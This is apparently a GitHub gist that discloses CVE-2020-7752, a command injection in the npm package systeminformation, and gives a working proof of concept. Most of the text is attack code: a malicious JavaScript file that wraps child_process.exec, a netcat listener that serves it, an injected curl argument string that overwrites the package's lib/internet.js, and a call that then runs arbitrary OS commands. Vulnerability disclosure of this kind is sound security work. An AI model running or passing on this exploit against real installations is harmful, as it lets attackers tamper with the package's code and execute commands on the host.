Skip to content

Instantly share code, notes, and snippets.

@EffectRenan
Last active November 12, 2020 02:30
Show Gist options
  • Save EffectRenan/feac4f96408563bad440562bd2e9b729 to your computer and use it in GitHub Desktop.
Save EffectRenan/feac4f96408563bad440562bd2e9b729 to your computer and use it in GitHub Desktop.
systeminformation - Command Injection

Vulnerability: Command Injection - CVE-2020-7752

References:

Package name: systeminformation

Tested package versions: 4.27.9, 4.27.10

Description: The attacker can concatenate curl's parameters to overwrite Javascript files of the package and then execute any OS commands.

Sensitive file: lib/internet.js

The child_process.exec() function executes the following command:

curl -I --connect-timeout 5 -m 5 $urlSanitized 2>/dev/null | head -n 1 | cut -d " " -f2 # $urlSanitized is the user input.

Steps To Reproduce:

Create a Javascript file with the content below (file.js):

const { exec } = require('child_process')
function inetChecksite(url) {
  return exec(url)
}
exports.inetChecksite = inetChecksite

We can use Netcat to create a TCP server to send our Javascript file created before on 443 port:

sudo nc -nlp 443 < file.js

Execute the code below to overwrite the Javascript file (lib/internet.js):

const si = require('systeminformation')
const HOST = "127.0.0.1:443"

//The telnet was chosen to solve an issue with the protocol response check, like HTTP (HTTP/1.0 200 OK in the first line).
si.inetChecksite(`telnet://${HOST} --no-buffer -o node_modules/systeminformation/lib/internet.js`)

setTimeout(() => {
  process.exit()
}, 2000)

Now we can execute OS commands:

const si = require('systeminformation')
si.inetChecksite("<Some OS command>")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment